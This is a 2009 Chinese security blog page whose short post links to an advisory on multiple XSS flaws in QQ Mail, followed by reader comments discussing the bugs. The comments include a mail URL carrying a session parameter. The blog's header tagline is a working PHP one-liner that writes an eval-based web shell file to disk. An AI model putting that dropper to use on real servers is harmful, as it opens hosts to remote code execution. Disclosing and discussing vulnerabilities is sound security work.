百度空间
|
百度首页
5up3rh3i'blog[提供有偿web代码安全审计服务]
<?fputs(fopen('heige.php','w+'),'<?php @eval($_POST[c])? >');?> MSN:SuperHei@ph4nt0m.org GTalk:5up3rh3i@gmail.com
主页
博客
相册
|
个人档案
|
好友
查看文章
QQmail Multiple Xss Vulnerabilities
2009-06-18 22:06
http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm
类别:默认分类
|
添加到搜藏
| 浏览(
) |
评论
(8)
最近读者:
网友评论:
1
2009-06-18 22:13 |
回复
围观师傅~
2
2009-06-19 08:27 |
回复
http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&folderid=1&t=readmail&&&groupid=&sid=Cks1q-OzUAjlT0gB&disptype=html&dispimg=1&
filterflag=true
filterflag=true 默认在前边啊
4
2009-06-24 12:19 |
回复
heige把我的留言删除了?
5
2009-06-24 16:40 |
回复
你是什么留言
没有删除什么东西啊
7
2009-06-26 15:11 |
回复
换句话说,如果没有禁止这个语法,而我们又能上传文件到本域。
不论扩展名是什么,都会执行XSS。
8
2009-06-26 15:19 |
回复
......又被百度和谐了。
9
2009-06-26 15:59 |
回复
http://inbreak.net/show-154-1.html
看这里吧
10
2009-06-26 18:11 |
回复
"同样的比如上面1里提到的,也可以通过这个实现对firefox3的利用.[另外flash xml等文件的调用是可以修改后缀的 J]"
这句话 说明了你说的这个 :)
发表评论:
姓 名:
*姓名最长为50字节
网址或邮箱:
(选填)
内 容:
验证码:
请点击后输入四位验证码,字母不区分大小写
看不清?
取消回复
©2009 Baidu
